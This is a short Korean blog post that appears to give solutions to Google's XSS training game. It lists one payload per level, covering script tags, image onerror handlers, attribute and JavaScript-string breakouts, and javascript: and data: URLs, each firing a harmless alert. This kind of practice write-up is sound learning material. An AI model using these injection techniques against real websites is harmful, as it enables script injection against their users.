구글에서 간단한 XSS 문제를 만들어둔 것이 있어 풀어 보았다. 문제 난이도는 쉬운 수준이고 자바스크립트와 html 소스 코드만 볼줄 안다면 쉽게 풀 수 있어 초급자들이 XSS 연습을 하기에 적당한 것 같다.
문제 주소는 아래와 같으며, 풀이는 설명 없이 풀이 코드만 첨부한다.
문제 주소 : https://xss-game.appspot.com/
[풀이]
Level 1 : https://xss-game.appspot.com/level1/frame?query=<script>alert('MaJ3stY')</script>
Level 2 : <img src='foobar' onerror='alert("MaJ3stY")'>
Level 3 : https://xss-game.appspot.com/level3/frame#1?num=123' onerror='alert("MaJ3stY")'>
Level 4 : https://xss-game.appspot.com/level4/frame?timer=');alert('MaJ3stY
Level 5 : https://xss-game.appspot.com/level5/frame/signup?next=javascript%3Aalert%28%27MaJ3stY%27%29
Level 6 : https://xss-game.appspot.com/level6/frame#data:text/plain,alert('MaJ3stY')
모든 문제를 풀면 아래와 같이 설문조사 페이지가 나오고 XSS 기본 방어 설명이 있는 페이지의 링크를 볼 수 있다.
'[+] Hacking > [-] Challenge Report' 카테고리의 다른 글
| [Write up] Network Forensics Puzzle Contest 22 (1) | 2014.09.07 |
|---|---|
| CodeGate 2014 Forensic 150 Write up (4) | 2014.02.24 |
| [For-MD] Sans Holiday Challenge 2013 Write up (0) | 2014.02.03 |
| [For.MD] 한국포렌식학회 경연대회 문제풀이 (16) | 2013.12.23 |
